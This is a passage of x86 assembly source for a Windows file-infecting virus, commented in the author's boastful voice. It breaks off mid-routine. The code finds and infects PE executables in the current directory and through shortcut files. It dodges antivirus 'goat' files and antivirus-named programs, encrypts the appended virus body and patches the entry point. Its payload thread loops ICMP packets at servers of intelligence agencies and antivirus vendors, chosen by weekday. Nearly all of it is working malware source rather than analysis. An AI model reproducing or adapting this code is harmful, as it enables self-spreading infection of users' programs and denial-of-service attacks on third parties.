KernelFound: ; we found the Kernel32.dll
|
||
|
sub edi, 16h ; set edi to the PE - Header
|
||
|
xchg eax, edi ; save PE address in eax
|
||
|
xchg ebx, esi ; save MZ address in ebx
|
||
|
cld
|
||
|
ret
|
||
|
|
||
|
NoKernel: ; if not found we don't set the carriage flag
|
||
|
stc
|
||
|
ret ; return if not found
|
||
|
|
||
|
|
||
|
K32Trys db 5h ; Search-Range
|
||
|
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; -----------------[ Infection of the current directory ]--------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
|
||
|
InfectCurDir: ; Here we infect the files in the current directory
|
||
|
; we use the FindFirstFile - FindNextFile API's
|
||
|
; to scan all files for PE-Executables and
|
||
|
; LNK-Files.
|
||
|
lea esi, [ebp+filemask]
|
||
|
call FindFirstFileProc
|
||
|
|
||
|
inc eax
|
||
|
jz EndInfectCurDir1 ; If there are no files, we return
|
||
|
dec eax
|
||
|
|
||
|
InfectCurDirFile:
|
||
|
; filename in esi
|
||
|
lea esi, [ebp+WFD_szFileName]
|
||
|
call InfectFile ; Try to infect it !
|
||
|
|
||
|
cmp [ebp+InfCounter], 0h ; if we infected enough files
|
||
|
jna EndInfectCurDir2 ; we return
|
||
|
|
||
|
call FindNextFileProc
|
||
|
|
||
|
test eax, eax
|
||
|
jnz InfectCurDirFile
|
||
|
|
||
|
EndInfectCurDir2: ; we close the search - Handle
|
||
|
|
||
|
push dword ptr [ebp+FindHandle]
|
||
|
call dword ptr [ebp+XFindClose]
|
||
|
|
||
|
EndInfectCurDir1: ; we just return
|
||
|
ret
|
||
|
|
||
|
|
||
|
InfCounter db 0h ; Counter for the number of files we infect
|
||
|
; at max in the current directory
|
||
|
; ( could take too long if we want to infect them
|
||
|
; all )
|
||
|
|
||
|
FindHandle dd 0h ; The handle for the FindFirstFile API
|
||
|
|
||
|
filemask db '*.*', 0 ; we search for all files, not just exe files
|
||
|
|
||
|
; these structures are nessecairy
|
||
|
; for the FindFileFirst - FindFileNext API's
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; ---------------------[ Prepare infection of file ]------------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
InfectFile: ; Here we prepare to infect the file
|
||
|
; the filename is in [ebp+WFD_szFileName]
|
||
|
; we open it and check if it is something
|
||
|
; we are able to infect...
|
||
|
; esi points to the filename..
|
||
|
|
||
|
cmp byte ptr [esi], '.' ; check if we got .. or .
|
||
|
je NoInfection
|
||
|
; if the file is smaller than
|
||
|
; 200 Bytes it will not get checked or
|
||
|
; infected !
|
||
|
|
||
|
cmp dword ptr [ebp+WFD_nFileSizeLow], 200d
|
||
|
jbe NoInfection
|
||
|
; we also don't infect it if it is too big
|
||
|
cmp dword ptr [ebp+WFD_nFileSizeHigh], 0
|
||
|
jne NoInfection
|
||
|
|
||
|
call CheckFileName ; check for AV-Files
|
||
|
jc NoInfection
|
||
|
|
||
|
; Get File-Attributes
|
||
|
lea eax, [ebp+WFD_szFileName]
|
||
|
push eax
|
||
|
call dword ptr [ebp+XGetFileAttributesA]
|
||
|
; save them
|
||
|
mov dword ptr [ebp+Attributes], eax
|
||
|
|
||
|
inc eax
|
||
|
jz NoInfection ; if we failed we don't infect
|
||
|
dec eax
|
||
|
|
||
|
push 80h ; clean attributes
|
||
|
lea eax, [ebp+WFD_szFileName]
|
||
|
push eax
|
||
|
call dword ptr [ebp+XSetFileAttributesA]
|
||
|
or eax, eax ; if we fail, we don't open the file
|
||
|
jz NoInfection ; if we have no access to set the attributes,
|
||
|
; we will surely not be allowed to change the file itself
|
||
|
|
||
|
call OpenFile ; open the file
|
||
|
jc NoInfection ; if we failed we don't infect..
|
||
|
|
||
|
mov esi, eax
|
||
|
call CheckMZSign ; if it is an EXE file, we go on
|
||
|
jc CheckLNK ; otherwise we test if it is a LNK
|
||
|
|
||
|
cmp word ptr [eax+3Ch], 0h
|
||
|
je CheckLNK
|
||
|
|
||
|
xor esi, esi ; get the start of the PE-Header
|
||
|
mov esi, [eax+3Ch]
|
||
|
; if it lies outside the file we skip it
|
||
|
cmp dword ptr [ebp+WFD_nFileSizeLow], esi
|
||
|
jb Notagoodfile
|
||
|
|
||
|
add esi, eax
|
||
|
|
||
|
mov edi, esi
|
||
|
call CheckPESign ; check if it is an PE-Executable
|
||
|
jc Notagoodfile
|
||
|
; check infection mark --> DDoS
|
||
|
; if it is there the file is already infected..
|
||
|
|
||
|
cmp dword ptr [esi+4Ch], 'SoDD'
|
||
|
jz Notagoodfile
|
||
|
|
||
|
mov bx, word ptr [esi+16h]; get characteristics
|
||
|
and bx, 0F000h ; we need just the Dll-Flag
|
||
|
cmp bx, 02000h
|
||
|
je Notagoodfile ; we will not infect dll-files
|
||
|
|
||
|
mov bx, word ptr [esi+16h]; get characteristics again
|
||
|
and bx, 00002h ; we check if it is no OBJ or something else..
|
||
|
cmp bx, 00002h
|
||
|
jne Notagoodfile
|
||
|
|
||
|
call InfectEXE ; ok, infect it !
|
||
|
; if there occoured an error
|
||
|
; while mapping the file again,
|
||
|
; we don't need to unmap & close it
|
||
|
jc NoInfection
|
||
|
jmp Notagoodfile
|
||
|
|
||
|
CheckLNK: ; check if we got an LNK-File
|
||
|
mov esi, dword ptr [ebp+MapAddress]
|
||
|
cmp word ptr [esi], 'L' ; check for sign
|
||
|
jne UnMapFile ; if it is no LNK File we close it
|
||
|
|
||
|
call InfectLNK
|
||
|
|
||
|
Notagoodfile:
|
||
|
call UnMapFile ; we store the file..
|
||
|
; we restore the file-attributes
|
||
|
|
||
|
push dword ptr [ebp+Attributes]
|
||
|
lea eax, [ebp+WFD_szFileName]
|
||
|
push eax
|
||
|
call dword ptr [ebp+XSetFileAttributesA]
|
||
|
|
||
|
NoInfection:
|
||
|
ret
|
||
|
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; ------------------------[ Open and close Files ]---------------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
OpenFile:
|
||
|
|
||
|
xor eax,eax ; let's open the file
|
||
|
push eax
|
||
|
push eax
|
||
|
push 3h
|
||
|
push eax
|
||
|
inc eax
|
||
|
push eax
|
||
|
push 80000000h or 40000000h
|
||
|
push esi ; name of file
|
||
|
call dword ptr [ebp+XCreateFileA]
|
||
|
|
||
|
inc eax
|
||
|
jz Closed ; if there is an error we don't infect the file
|
||
|
dec eax ; now the handle is in eax
|
||
|
; we save it
|
||
|
|
||
|
mov dword ptr [ebp+FileHandle],eax
|
||
|
|
||
|
; if we map a file normal, we map it with the size
|
||
|
; in the Find32-Data
|
||
|
; otherwise it is in ecx
|
||
|
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
|
||
|
|
||
|
CreateMap:
|
||
|
push ecx ; save the size
|
||
|
|
||
|
xor eax,eax ; we create a map of the file to
|
||
|
push eax ; be able to edit it
|
||
|
push ecx
|
||
|
push eax
|
||
|
push 00000004h
|
||
|
push eax
|
||
|
push dword ptr [ebp+FileHandle]
|
||
|
call dword ptr [ebp+XCreateFileMappingA]
|
||
|
|
||
|
mov dword ptr [ebp+MapHandle],eax
|
||
|
|
||
|
pop ecx ; get the size again..
|
||
|
test eax, eax ; if there is an error we close the file
|
||
|
jz CloseFile ; no infection today :(
|
||
|
|
||
|
xor eax,eax ; we map the file.. *bla*
|
||
|
push ecx
|
||
|
push eax
|
||
|
push eax
|
||
|
push 2h
|
||
|
push dword ptr [ebp+MapHandle]
|
||
|
call dword ptr [ebp+XMapViewOfFile]
|
||
|
|
||
|
or eax,eax ; if there is an error, we unmap it
|
||
|
jz UnMapFile
|
||
|
; eax contains the offset where
|
||
|
; our file is mapped.. *g*
|
||
|
|
||
|
mov dword ptr [ebp+MapAddress],eax
|
||
|
; Clear c-flag for successful opening
|
||
|
clc
|
||
|
|
||
|
ret ; we successfully opened it !
|
||
|
|
||
|
UnMapFile: ; ok, unmap it
|
||
|
|
||
|
call UnMapFile2
|
||
|
|
||
|
CloseFile: ; let's close it
|
||
|
|
||
|
push dword ptr [ebp+FileHandle]
|
||
|
call [ebp+XCloseHandle]
|
||
|
|
||
|
Closed:
|
||
|
stc ; set carriage flag
|
||
|
|
||
|
ret
|
||
|
|
||
|
UnMapFile2: ; we need to unmap it some times, to
|
||
|
; map it again with more space..
|
||
|
|
||
|
push dword ptr [ebp+MapAddress]
|
||
|
call dword ptr [ebp+XUnmapViewOfFile]
|
||
|
|
||
|
push dword ptr [ebp+MapHandle]
|
||
|
call dword ptr [ebp+XCloseHandle]
|
||
|
|
||
|
ret
|
||
|
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; -------------------------[ Infect an EXE-FILE ]----------------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
InfectEXE: ; MapAddress contains the starting offset of the file
|
||
|
|
||
|
; we will not infect exe files, which are smaller than
|
||
|
; 40 Kb, this is for avoiding goat files.
|
||
|
; AV's use them to study viruses !
|
||
|
|
||
|
cmp dword ptr [ebp+WFD_nFileSizeLow] , 0A000h
|
||
|
jb NoEXE
|
||
|
|
||
|
mov ecx, [esi+3Ch] ; esi points to the PE-Header
|
||
|
; ecx contains file-alignment
|
||
|
; put size in eax
|
||
|
|
||
|
mov eax, dword ptr [ebp+WFD_nFileSizeLow]
|
||
|
add eax, dword ptr [ebp+VirLen]
|
||
|
|
||
|
call Align ; align it and save the new size
|
||
|
mov dword ptr [ebp+NewSize], eax
|
||
|
xchg ecx, eax
|
||
|
|
||
|
pushad ; save registers
|
||
|
; we close the file and map it again,
|
||
|
; but this time we will load it
|
||
|
; with some more space, so we can add
|
||
|
; our code *eg*
|
||
|
call UnMapFile2
|
||
|
popad
|
||
|
|
||
|
call CreateMap ; we map it again with a bigger size
|
||
|
; if we got an error we return
|
||
|
jc NoEXE
|
||
|
; make esi point to the PE-Header again
|
||
|
; get offset
|
||
|
mov esi, dword ptr [eax+3Ch]
|
||
|
; make it VA
|
||
|
add esi, eax
|
||
|
mov edi, esi ; edi = esi
|
||
|
; eax = number of sections
|
||
|
movzx eax, word ptr [edi+06h]
|
||
|
dec eax
|
||
|
imul eax, eax, 28h ; multiply with size of section header
|
||
|
add esi, eax ; make it VA
|
||
|
add esi, 78h ; make it point to dir table
|
||
|
; esi points now to the dir-table
|
||
|
|
||
|
mov edx, [edi+74h] ; get number of dir - entrys
|
||
|
shl edx, 3h ; multiply with 8
|
||
|
add esi, edx ; make point to the last section
|
||
|
|
||
|
; get the Entry Point and save it
|
||
|
; we need it to be able to return
|
||
|
; to the original file
|
||
|
|
||
|
mov eax, [edi+28h]
|
||
|
mov dword ptr [ebp+OldEIP], eax
|
||
|
|
||
|
; get the imagebase, also needed to
|
||
|
; execute original file
|
||
|
mov eax, [edi+34h]
|
||
|
mov dword ptr [ebp+OldBase], eax
|
||
|
|
||
|
mov edx, [esi+10h] ; size of raw data
|
||
|
; we will increase it later
|
||
|
mov ebx, edx
|
||
|
add edx, [esi+14h] ; edx = Pointer to raw-data
|
||
|
|
||
|
push edx ; save it in stack
|
||
|
|
||
|
mov eax, ebx
|
||
|
add eax, [esi+0Ch] ; make it VA
|
||
|
; this is our new EIP
|
||
|
|
||
|
mov [edi+28h], eax
|
||
|
mov dword ptr [ebp+NewEIP], eax
|
||
|
|
||
|
mov eax, [esi+10h] ; get size of Raw-data
|
||
|
push eax
|
||
|
add eax, dword ptr [ebp+VirLen]
|
||
|
; increase it
|
||
|
mov ecx, [edi+3Ch] ; Align it
|
||
|
|
||
|
call Align
|
||
|
|
||
|
; save it in the file as
|
||
|
; new size of rawdata and
|
||
|
mov [esi+10h], eax
|
||
|
|
||
|
pop eax ; new Virtual size
|
||
|
add eax, dword ptr [ebp+VirLen]
|
||
|
add eax, Buffersize
|
||
|
mov [esi+08h], eax
|
||
|
|
||
|
pop edx
|
||
|
|
||
|
mov eax, [esi+10h]
|
||
|
add eax, [esi+0Ch] ; New Size of Image
|
||
|
; save it in the file
|
||
|
mov [edi+50h], eax
|
||
|
; change section flags to make
|
||
|
; us have write & read access to it
|
||
|
; when the infected file is run
|
||
|
; we also set the code flag.. ;)
|
||
|
or dword ptr [esi+24h], 0A0000020h
|
||
|
; we write our infection mark to the program,
|
||
|
; so we will not infect it twice
|
||
|
; --> DDoS
|
||
|
mov dword ptr [edi+4Ch], 'SoDD'
|
||
|
push edi ; save them
|
||
|
push edx
|
||
|
|
||
|
push 10d
|
||
|
pop ecx
|
||
|
call GetRand ; get random number ( we'll use the EAX value )
|
||
|
|
||
|
pop edi ; restore and xchange
|
||
|
pop edx
|
||
|
|
||
|
mov word ptr [ebp+Key], ax
|
||
|
push eax ; save it 2 times
|
||
|
|
||
|
lea esi, [ebp+Virus] ; point to start of virus
|
||
|
add edi, dword ptr [ebp+MapAddress]
|
||
|
push edi ; save edi
|
||
|
|
||
|
mov ecx, dword ptr [ebp+VirLen]
|
||
|
; get size of virus in ecx
|
||
|
rep movsb ; append virus !
|
||
|
|
||
|
pop esi ; decrypt the virus
|
||
|
mov edi, esi
|
||
|
add esi, NoCrypt
|
||
|
mov ecx, (CryptSize / 2)
|
||
|
|
||
|
pop edx ; get key from stack
|
||
|
push edi ; save start
|
||
|
mov edi, esi
|
||
|
|
||
|
EnCryptLoop: ; decrypt with second layer
|
||
|
lodsw
|
||
|
not ax
|
||
|
inc dx
|
||
|
xchg dl, dh
|
||
|
xor ax, dx
|
||
|
xchg al, ah
|
||
|
stosw
|
||
|
loop EnCryptLoop
|
||
|
|
||
|
|
||
|
pop esi ; let's start decrypting with the second layer
|
||
|
add esi, 05h ; skip the call
|
||
|
mov ecx, FirstLSize ; mov size to ecx
|
||
|
mov edi, esi
|
||
|
mov edx, dword ptr [ebp+CryptType]
|
||
|
xor eax, eax
|
||
|
|
||
|
XorEncrypt: ; we use a simple xor
|
||
|
dec edx
|
||
|
jnz NegEncrypt
|
||
|
mov dl, byte ptr [ebp+PolyKey]
|
||
|
|
||
|
@Xor:
|
||
|
lodsb
|
||
|
xor al, dl
|
||
|
stosb
|
||
|
loop @Xor
|
||
|
jmp EndPolyCrypto
|
||
|
|
||
|
NegEncrypt:
|
||
|
dec edx
|
||
|
jnz NotEncrypt
|
||
|
@Neg:
|
||
|
lodsb
|
||
|
neg al
|
||
|
stosb
|
||
|
loop @Neg
|
||
|
jmp End2LCrypto
|
||
|
|
||
|
NotEncrypt: ; not byte ptr [esi]
|
||
|
dec edx
|
||
|
jnz IncEncrypt
|
||
|
@Not:
|
||
|
lodsb
|
||
|
not al
|
||
|
stosb
|
||
|
loop @Not
|
||
|
jmp End2LCrypto
|
||
|
|
||
|
IncEncrypt: ; inc byte ptr [esi]
|
||
|
dec edx
|
||
|
jnz DecEncrypt
|
||
|
@Inc:
|
||
|
lodsb
|
||
|
dec al
|
||
|
stosb
|
||
|
loop @Inc
|
||
|
jmp End2LCrypto
|
||
|
|
||
|
DecEncrypt: ; dec byte ptr [esi]
|
||
|
lodsb
|
||
|
inc al
|
||
|
stosb
|
||
|
loop DecEncrypt
|
||
|
|
||
|
End2LCrypto:
|
||
|
|
||
|
dec byte ptr [ebp+InfCounter]
|
||
|
|
||
|
; if we succesfully received the dll and the
|
||
|
; function, we create a checksum for the
|
||
|
; file ( needed for dll's and WinNT )
|
||
|
cmp [ebp+XCheckSumMappedFile], 0h
|
||
|
je NoCRC
|
||
|
|
||
|
lea esi, [ebp+CheckSum]
|
||
|
push esi
|
||
|
lea esi, [ebp+HeaderSum]
|
||
|
push esi
|
||
|
push dword ptr [ebp+NewSize]
|
||
|
push dword ptr [ebp+MapAddress]
|
||
|
call dword ptr [ebp+XCheckSumMappedFile]
|
||
|
|
||
|
test eax, eax ; if this failed we don't save
|
||
|
jz NoCRC ; the crc
|
||
|
|
||
|
mov eax, dword ptr [ebp+MapAddress]
|
||
|
; eax points to the dos-stub
|
||
|
mov esi, [eax+3Ch] ; esi points to PE-Header
|
||
|
add esi, eax ; save CRC in header
|
||
|
|
||
|
mov eax, dword ptr [ebp+CheckSum]
|
||
|
mov [esi+58h], eax
|
||
|
|
||
|
NoCRC:
|
||
|
ret
|
||
|
NoEXE: ; let's return and close the infected file
|
||
|
; this will also write it to disk !
|
||
|
stc
|
||
|
ret
|
||
|
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; ------------------------[ Infect an LNK-FILE ]-----------------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
|
||
|
InfectLNK: ; if we find a link file, we try to find the
|
||
|
; file it points to. If it is a EXE File we are able
|
||
|
; to infect, we do so
|
||
|
; this will not work with NT-LNK-Files, there we will
|
||
|
; receive only the Drive, where the file is located
|
||
|
|
||
|
; ok, if a LNK is bigger than 1 Meg, it is none
|
||
|
; we check .. ;)
|
||
|
cmp dword ptr [ebp+WFD_nFileSizeLow] , 0400h
|
||
|
ja NoLNK
|
||
|
|
||
|
; get the start addy in esi, and and the size
|
||
|
mov esi, dword ptr [ebp+MapAddress]
|
||
|
mov ecx, dword ptr [ebp+WFD_nFileSizeLow]
|
||
|
xor edx, edx
|
||
|
add esi, ecx ; we start checking at the end of the file
|
||
|
; for a valid filename in it
|
||
|
CheckLoop:
|
||
|
cmp byte ptr [esi], 3ah ; we detect a filename by the 2 dots ( 3ah = : )
|
||
|
jne LNKSearch ; in the Drive
|
||
|
|
||
|
inc edx ; there are 2 times 2 dots, when checking from
|
||
|
cmp edx, 2d ; the end of the LNK, we need the 2.nd
|
||
|
je PointsDetected
|
||
|
|
||
|
LNKSearch: ; go on searching
|
||
|
dec esi
|
||
|
loop CheckLoop
|
||
|
; if we end here, we did not find the two dots.. :(
|
||
|
NoLNK:
|
||
|
|
||
|
ret
|
||
|
|
||
|
PointsDetected: ; we found the drive ( two dots ... *g* )
|
||
|
; esi points to them, now we need to check
|
||
|
; for the start of the name..
|
||
|
|
||
|
cmp byte ptr [esi+1], 0h ; check if we got an entire path or just a
|
||
|
je NoLNK ; single drive ( may happen in NT / 2k )
|
||
|
|
||
|
|
||
|
PointsDetected2:
|
||
|
dec esi
|
||
|
cmp byte ptr [esi], 0h
|
||
|
je NameDetected
|
||
|
|
||
|
loop PointsDetected2 ; ecx still takes care, that we don't
|
||
|
; search too far..
|
||
|
jmp NoLNK ; nothing found ? return..
|
||
|
|
||
|
NameDetected: ; ok, esi points now to the name of the file
|
||
|
; so we try a FindFileFirst to get the information
|
||
|
; first, we save the information in the WIN32_FIND_DATA
|
||
|
; then we try to find the file.
|
||
|
inc esi
|
||
|
push esi ; save it
|
||
|
|
||
|
lea esi, [ebp+WIN32_FIND_DATA]
|
||
|
lea edi, [ebp+Buffer] ; save the old WIN32_FIND_DATA
|
||
|
mov ecx, 337d ; and some more data
|
||
|
rep movsb
|
||
|
|
||
|
lea edi, [ebp+WIN32_FIND_DATA]
|
||
|
xor eax, eax ; clean this field
|
||
|
mov ecx, 337d
|
||
|
rep stosb
|
||
|
|
||
|
pop esi
|
||
|
|
||
|
call FindFirstFileProc
|
||
|
|
||
|
inc eax
|
||
|
jz RestoreLNK ; If there are no files, we return
|
||
|
dec eax
|
||
|
; otherwise we save the handle
|
||
|
|
||
|
; if we went here, we know the file exists
|
||
|
; esi still points to the filename including the
|
||
|
; directory, we save this in the win32_Find_DATA
|
||
|
; field, because the name there contains no path
|
||
|
|
||
|
lea edi, [ebp+WFD_szFileName]
|
||
|
mov ecx, 259d ; we just move 259 Bytes, so there is still a ending
|
||
|
; Zero if the name is longer and we just get a simple error
|
||
|
; and not an SEH or some other shit
|
||
|
rep movsb
|
||
|
lea esi, [ebp+WFD_szFileName]
|
||
|
call InfectFile ; esi points to the filename again, so we infect it ;)
|
||
|
|
||
|
push dword ptr [ebp+LNKFindHandle]
|
||
|
call dword ptr [ebp+XFindClose]
|
||
|
|
||
|
RestoreLNK:
|
||
|
lea edi, [ebp+WIN32_FIND_DATA]
|
||
|
lea esi, [ebp+Buffer] ; restore the old WIN32_FIND_DATA
|
||
|
mov ecx, 337d ; and some other data
|
||
|
rep movsb
|
||
|
|
||
|
ret ; return to find more files
|
||
|
|
||
|
LNKFindHandle dd 0h ; here we save the search-handle
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; ---------------------[ The evil Part: the Payload ]------------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
|
||
|
|
||
|
PayLoad: ; here we handle the payload of the virus *eg*
|
||
|
|
||
|
cmp dword ptr [ebp+W32Handle],0
|
||
|
jne ExecuteHost
|
||
|
|
||
|
cmp dword ptr [ebp+XCreateThread],0
|
||
|
je ExecuteHost ; we better check this, cause this api does not exist in 2k
|
||
|
|
||
|
|
||
|
lea eax, [ebp+SystemTime] ; retrieve current date, time,.. whatever
|
||
|
push eax
|
||
|
call dword ptr [ebp+XGetSystemTime]
|
||
|
|
||
|
lea esi, [ebp+wDayOfWeek] ; get the day
|
||
|
xor eax, eax
|
||
|
lodsw
|
||
|
|
||
|
shl eax, 2h ; multiply with 4
|
||
|
; get Target
|
||
|
lea esi, [ebp+TargetTable]
|
||
|
add esi, eax
|
||
|
lea edi, [ebp+Target_IP] ; write IP to Destination Address Field
|
||
|
movsd
|
||
|
; we get a nice target for the payload
|
||
|
; and create a new thread to fulfill it ;)
|
||
|
|
||
|
push offset threadID ; here we save the thread ID
|
||
|
push 0h
|
||
|
push 0h
|
||
|
push offset PingFlood ; here starts the code of the new thread
|
||
|
push 0h
|
||
|
push 0h
|
||
|
call dword ptr [ebp+XCreateThread]
|
||
|
|
||
|
jmp ExecuteHost ; we're finished, so we execute the host-file
|
||
|
|
||
|
PingFlood: ; this is the thread of the payload !
|
||
|
; here are we doing the really evil thingies ;)
|
||
|
; we will start pinging a server ;P
|
||
|
|
||
|
lea eax, [ebp+offset WSA_DATA]
|
||
|
push eax ; where is it..
|
||
|
push 0101h ; required version
|
||
|
call dword ptr [ebp+XWSAStartup]
|
||
|
|
||
|
push 1 ; We want to use the icmp protocoll
|
||
|
push 3 ; SOCK_STREAM
|
||
|
push 2 ; Address Format
|
||
|
call dword ptr [ebp+Xsocket]
|
||
|
|
||
|
mov dword ptr [ebp+ICMP_Handle], eax
|
||
|
|
||
|
push 4 ; set the options ( timeout, not really
|
||
|
; nessecairy in this case *g* )
|
||
|
lea eax, [ebp+offset Timeout]
|
||
|
push eax
|
||
|
push 1006h
|
||
|
push 0FFFFh
|
||
|
push eax
|
||
|
call dword ptr [ebp+Xsetsockopt]
|
||
|
|
||
|
; we need to create a checksum for the packet
|
||
|
lea esi, [ebp+ICMP_Packet]; nothing serious just some additions
|
||
|
|
||
|
push 6 ; we do this for 6 words
|
||
|
pop ecx ; = 12 bytes
|
||
|
xor edx, edx
|
||
|
|
||
|
CreateICMP_CRC: ; load one
|
||
|
lodsw
|
||
|
movzx eax, ax ; mov it to eax ( clean upper part of eax )
|
||
|
add edx, eax ; add it to edx ( we just add them all )
|
||
|
loop CreateICMP_CRC
|
||
|
|
||
|
movzx eax, dx ; add the lower ( dx ) and the upper part of
|
||
|
shr edx, 16d ; edx together in eax
|
||
|
add eax, edx
|
||
|
|
||
|
movzx edx, ax ; save ax in edx
|
||
|
shr eax, 16d ; mov upper part of eax to ax ( clean upper part )
|
||
|
add eax, edx ; add old ax to new ax ( add upper part to lower part )
|
||
|
|
||
|
not eax ; eax = - 1 * ( eax + 1 )
|
||
|
; this is our checksum
|
||
|
mov word ptr [ebp+ICMP_CRC], ax
|
||
|
|
||
|
|
||
|
push 16d ; get it out, we send our packet !
|
||
|
lea eax, [ebp+offset Info]
|
||
|
push eax
|
||
|
push 0
|
||
|
push 12d
|
||
|
lea eax, [ebp+offset ICMP_Packet]
|
||
|
push eax
|
||
|
push dword ptr [ebp+ICMP_Handle]
|
||
|
call dword ptr [ebp+Xsendto]
|
||
|
|
||
|
CloseSocket: ; close the socket, to stay stable ;)
|
||
|
push dword ptr [ebp+ICMP_Handle]
|
||
|
call dword ptr [ebp+Xclosesocket]
|
||
|
call dword ptr [ebp+XWSACleanup]
|
||
|
|
||
|
|
||
|
jmp PingFlood ; heh that was fun, let's do it again ;)
|
||
|
|
||
|
|
||
|
Timeout dd 100000d ; 10000 ms Timeout ( we don't really care about it *g* )
|
||
|
Info:
|
||
|
dw 2h
|
||
|
dw 0h
|
||
|
Target_IP db 0d, 0d, 0d, 0d
|
||
|
dd 0h ; there we will fill in the target ip address ;)
|
||
|
ICMP_Packet db 8h
|
||
|
db 0h
|
||
|
ICMP_CRC dw 0h ; for the CRC Calculation of the ping
|
||
|
dd 0h
|
||
|
dd 0h
|
||
|
dd 0h
|
||
|
ICMP_Handle dd 0h ; the handle of the open Socket
|
||
|
|
||
|
TargetTable: ; these are our targets
|
||
|
; please note again, that i don't want to damage one
|
||
|
; of these servers ! I choose them because I think that
|
||
|
; they will stand such an attack if anyone will ever release this
|
||
|
; into the wild !!!
|
||
|
|
||
|
db 62d, 156d, 146d, 231d ; Sunday = www.bundesnachrichtendienst.de
|
||
|
db 195d, 154d, 220d, 34d ; Monday = French Secret Service ( dgse.citeweb.net )
|
||
|
db 216d, 122d, 8d, 245d ; Tuesday = www.avp.com ( AV )
|
||
|
db 216d, 41d, 20d, 75d ; Wednesday = www.lockdown2000.com
|
||
|
db 194d, 252d, 6d, 47d ; Thursday = www.f-secure.com
|
||
|
db 208d, 226d, 167d, 23d ; Friday = www.norton.com
|
||
|
db 205d, 178d, 21d, 3d ; Saturday = www.zonelabs.com
|
||
|
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; -------------------------[ Align-Procedure ]-------------------------------
|
||
|
; ***************************************************************************
|
||
|
; lets align the size..
|
||
|
; eax - size
|
||
|
; ecx - base
|
||
|
Align:
|
||
|
push edx
|
||
|
xor edx, edx
|
||
|
push eax
|
||
|
div ecx
|
||
|
pop eax
|
||
|
sub ecx, edx
|
||
|
add eax, ecx
|
||
|
pop edx ; eax - new size
|
||
|
ret
|
||
|
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; --------------------------[ FindFile Procedures ]--------------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
|
||
|
FindFirstFileProc:
|
||
|
lea eax, [ebp+WIN32_FIND_DATA]
|
||
|
push eax
|
||
|
push esi
|
||
|
call dword ptr [ebp+XFindFirstFileA]
|
||
|
mov dword ptr [ebp+FindHandle], eax
|
||
|
ret
|
||
|
|
||
|
FindNextFileProc:
|
||
|
lea edi, [ebp+WFD_szFileName]
|
||
|
mov ecx, 276d ; we clear these fields !
|
||
|
xor eax, eax
|
||
|
rep stosb
|
||
|
|
||
|
lea eax, [ebp+WIN32_FIND_DATA]
|
||
|
push eax
|
||
|
mov eax, dword ptr [ebp+FindHandle]
|
||
|
push eax
|
||
|
call dword ptr [ebp+XFindNextFileA]
|
||
|
ret
|
||
|
|
||
|
CheckFileName:
|
||
|
pushad
|
||
|
lea esi, [ebp+WFD_szFileName]
|
||
|
mov edi, esi
|
||
|
mov ecx, 260d
|
||
|
|
||
|
ConvertLoop: ; Convert to upper cases
|
||
|
lodsb
|
||
|
cmp al, 96d
|
||
|
jb Convert
|
||
|
cmp al, 123d
|
||
|
ja Convert
|
||
|
or al, al
|
||
|
jz EndConvert
|
||
|
sub al, 32d
|
||
|
Convert:
|
||
|
stosb
|
||
|
loop ConvertLoop
|
||
|
|
||
|
EndConvert:
|
||
|
lea edi, [ebp+WFD_szFileName]
|
||
|
lea esi, [ebp+FileNames]
|
||
|
mov ecx, 3h
|
||
|
|
||
|
FileNameCheck: ; check for av-names
|
||
|
push ecx ; i don't want to infect them
|
||
|
mov ecx, 260d
|
||
|
|
||
|
CheckON:
|
||
|
lodsb
|
||
|
repnz scasb
|
||
|
or ecx, ecx
|
||
|
jnz AVFile
|
||
|
|
||
|
pop ecx
|
||
|
inc esi
|
||
|
loop FileNameCheck
|
||
|
|
||
|
jmp EndFileNameCheck
|
||
|
|
||
|
|
||
|
AVFile:
|
||
|
mov al, byte ptr [esi] ; check if the second char also matches
|
||
|
cmp byte ptr [edi], al
|
||
|
je GotAVFile
|
||
|
|
||
|
dec esi
|
||
|
jmp CheckON
|
||
|
|
||
|
GotAVFile:
|
||
|
pop ecx ; clear stack
|
||
|
popad
|
||
|
stc ; set carriage flag
|
||
|
ret
|
||
|
|
||
|
EndFileNameCheck:
|
||
|
popad
|
||
|
clc
|
||
|
ret
|
||
|
|
||
|
|
||
|
FileNames db 'AV' ; we avoid these names
|
||
|
db 'AN' ; so we will not infect an AV and
|
||
|
db 'DR' ; alert the user
|
||
|
|
||
|
;****************************************************************************
|
||
|
; ---------------------[ Checks for PE / MZ Signs ]--------------------------
|
||
|
; ***************************************************************************
|
||
|
; we check here for PE and MZ signs
|
||
|
; to identify the Executable we want to infect
|
||
|
; I do this a little bit different than usual *g*
|
||
|
CheckPESign:
|
||
|
cmp dword ptr [edi], 'FP' ; check if greater or equal to PF
|
||
|
jae NoPESign
|
||
|
|
||
|
cmp dword ptr [edi], 'DP' ; check if lower or equal to PD
|
||
|
jbe NoPESign
|
||
|
|
||
|
clc ; all that's left is PE
|
||
|
ret
|
||
|
|
||
|
NoPESign:
|
||
|
stc ; set carriage flag
|
||
|
ret
|
||
|
|
||
|
CheckMZSign:
|
||
|
cmp word ptr [esi], '[M'
|
||
|
jae NoPESign
|
||
|
|
||
|
cmp word ptr [esi], 'YM'
|
||
|
jbe NoPESign
|
||
|
|
||
|
clc
|
||
|
ret
|
||
|
ret
|
||
|
|
||
|
; ***************************************************************************
|
||
|
; ----------------[ Generate a pesudo-random Number ]------------------------
|
||
|
; ***************************************************************************
|
||
|
|
||
|
GetRand:
|
||
|
; generate a pseudo-random NR.
|
||
|
; based on some initial registers
|
||
|
push ecx ; and the Windows - Ontime
|
||
|
add ecx, eax
|
||
|
call dword ptr [ebp+XGetTickCount]
|
||
|
add eax, ecx
|
||
|
add eax, ecx
|
||
|
